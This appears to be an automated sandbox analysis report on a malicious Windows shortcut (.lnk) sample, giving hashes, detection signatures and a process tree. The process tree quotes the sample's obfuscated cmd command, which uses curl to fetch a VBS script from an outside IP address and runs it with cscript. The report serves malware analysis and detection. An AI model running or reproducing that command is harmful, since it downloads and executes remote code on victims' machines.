Analysis
-
max time kernel
120s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
12/10/2023, 00:00
Static task
static1
Behavioral task
behavioral1
Sample
2b31d24b4040c4e57b0763eb38c387f3d98411780e9e3580a6f1933e1bcfa2df.lnk
Resource
win7-20230831-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
2b31d24b4040c4e57b0763eb38c387f3d98411780e9e3580a6f1933e1bcfa2df.lnk
Resource
win10v2004-20230915-en
6 signatures
150 seconds
General
-
Target
2b31d24b4040c4e57b0763eb38c387f3d98411780e9e3580a6f1933e1bcfa2df.lnk
-
Size
2KB
-
MD5
1f5ddc00ded03b107ed1306f49592188
-
SHA1
a44896e8ad949c6c83f3d8cb1caccf6056e8ed22
-
SHA256
2b31d24b4040c4e57b0763eb38c387f3d98411780e9e3580a6f1933e1bcfa2df
-
SHA512
85131d8da35735a31b0cb0570e89bb18cefee09a237bb8c6a9f860b5bc19c2a73146f98c9603f28950f3d32b7dfb1ed8b67c7196dbc6de4f119c56ee5bf53668
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2492 PING.EXE 2512 PING.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2408 wrote to memory of 2780 2408 cmd.exe 29 PID 2408 wrote to memory of 2780 2408 cmd.exe 29 PID 2408 wrote to memory of 2780 2408 cmd.exe 29 PID 2780 wrote to memory of 2492 2780 cmd.exe 30 PID 2780 wrote to memory of 2492 2780 cmd.exe 30 PID 2780 wrote to memory of 2492 2780 cmd.exe 30 PID 2780 wrote to memory of 2512 2780 cmd.exe 31 PID 2780 wrote to memory of 2512 2780 cmd.exe 31 PID 2780 wrote to memory of 2512 2780 cmd.exe 31 PID 2780 wrote to memory of 2356 2780 cmd.exe 32 PID 2780 wrote to memory of 2356 2780 cmd.exe 32 PID 2780 wrote to memory of 2356 2780 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\2b31d24b4040c4e57b0763eb38c387f3d98411780e9e3580a6f1933e1bcfa2df.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c GD || echO GD & PI"n"G GD || CU"R"l http://185.39.18.170/ER/rbo -o C:\Users\Admin\AppData\Local\Temp\GD.vbs & PI"n"G -n 2 GD || cS"CR"I"pt" C:\Users\Admin\AppData\Local\Temp\GD.vbs & ExIT2⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\system32\PING.EXEPI"n"G GD3⤵
- Runs ping.exe
PID:2492
-
-
C:\Windows\system32\PING.EXEPI"n"G -n 2 GD3⤵
- Runs ping.exe
PID:2512
-
-
C:\Windows\system32\cscript.execS"CR"I"pt" C:\Users\Admin\AppData\Local\Temp\GD.vbs3⤵PID:2356
-
-